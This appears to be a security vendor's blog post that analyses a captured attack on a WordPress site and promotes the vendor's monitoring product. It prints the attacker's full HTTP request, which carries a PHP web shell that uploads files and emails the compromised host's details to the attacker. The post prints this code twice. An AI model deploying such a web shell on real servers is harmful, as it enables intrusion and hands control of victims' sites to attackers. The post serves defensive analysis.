Web App Security

Lessons from DarkLogic: Hacking WordPress


Ricardo Sanchez

July 28, 2020

According to different sources, the most popular Content and Management Systems (CMS) to manage and deploy websites in the market is WordPress. With features such as ease of use, page management, and an extensive universe of plugins to choose from,  its not difficult to see why it is a customer favorite.

The flip side of popularity and customer usage is the security risk exposed to customers. Hackers typically invest their time and efforts on widely popular systems, so their attack is more effective and covers a wider attack surface. According to ZDNet, more than 90% of hacked CMS sites in 2018 were WordPress sites.

We at FiberWolf protect customers from different industries with our DarkLogic Continuous Security software. Recently, DarkLogic was able to pickup ‘in the wild’ different WordPress attacks performed against our Customers. With DarkLogic, we can examine the payload of the attack, to further investigate the hacker’s motives and intentions. Let’s take a look at one attack performed against a WordPress site this last week.

This particular attack is performed via Command Injection, actually #1 in the Top 10 attacks performed against Web Applications today. Let’s examine the Payload (identity removed to protect end user):

POST xxxxxx/upload.php HTTP/1.1 Host: xxxxx Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.23.0 Content-Length: 1195 Content-Type: multipart/form-data; boundary=6686f09ce766e678e1b43c52e109caf2 --6686f09ce766e678e1b43c52e109caf2 Content-Disposition: form-data; name="qqfile"; filename="xxxxxx" Content-Type: multipart/form-data ?php $str = 'xxx';echo base64_decode($str); ? titleghghgh/title ?php echo 'xxxv7up uname'.'br'.'uname:'.php_uname().'br'.$cwd = getcwd(); Echo 'center form method="post" target="_self" enctype="multipart/form-data" input type="file" size="20" name="uploads" / input type="submit" value="upload" / /form /center/td/tr /tablebr'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "scriptalert('upload Done'); . . /scriptbUploaded !!!/bbrname : ".$_FILES['uploads']['name']."brsize : ".$_FILES['uploads']['size']."brtype : ".$_FILES['uploads']['type']; } ? ?php $ip = getenv("REMOTE_ADDR"); $ra44 = rand(1, 99999); $subj98 = " Bot v6 xxxx |$ip"; $email = "xxxx@gmail.com"; $from = "From: xxx@xxxx.com"; $a45 = $_SERVER['REQUEST_URI']; $b75 = $_SERVER['HTTP_HOST']; $m22 = $ip . ""; $msg8873 = "$a45 $b75 $m22"; mail($email, $subj98, $msg8873, $from); ?

As you may have noticed, the hacker injected malicious PHP code inside the request. Let’s break out the PHP code in a more human-readable format.

       $str = ‘xxx’;
       echo base64_decode($str);
       echo ‘xxxSpyv7up uname’.’br’.’uname:’.php_uname().’br’.$cwd = getcwd();
       echo ‘center form method=”post” target=”_self” enctype=”multipart/form-data” input type=”file” size=”20″ name=”uploads” / input type=”submit” value=”upload” / /form /center/td/tr /tablebr’;

       if (!empty ($_FILES[‘uploads’])) {
       echo “scriptalert(‘upload Done’); . . /scriptbUploaded !!!/bbrname : “.$_FILES[‘uploads’][‘name’].”brsize : “.$_FILES[‘uploads’][‘size’].”brtype : “.$_FILES[‘uploads’][‘type’];

       $ip = getenv(“REMOTE_ADDR”);
       $ra44 = rand(1, 99999);
       $subj98 = ” Bot v6 xxxx |$ip”;
       $email =”xxxx@gmail.com”;
       $from = “From: xxx@xxxx.com”;
       $a45 = $_SERVER[‘REQUEST_URI’];
       $b75 = $_SERVER[‘HTTP_HOST’];
       $m22 = $ip . “”;
       $msg8873 = “$a45 $b75 $m22”;
       mail($email, $subj98, $msg8873, $from);

Interesting PHP code! It appears trying to upload a malicious file via an upload vulnerability, and then email him/herself to get a notice of the hacked IP (hacker email obfuscated for security measures).

It is important to keep your WordPress site up to date with the latest security patches. Learn more about how DarkLogic can help you  and send us a message.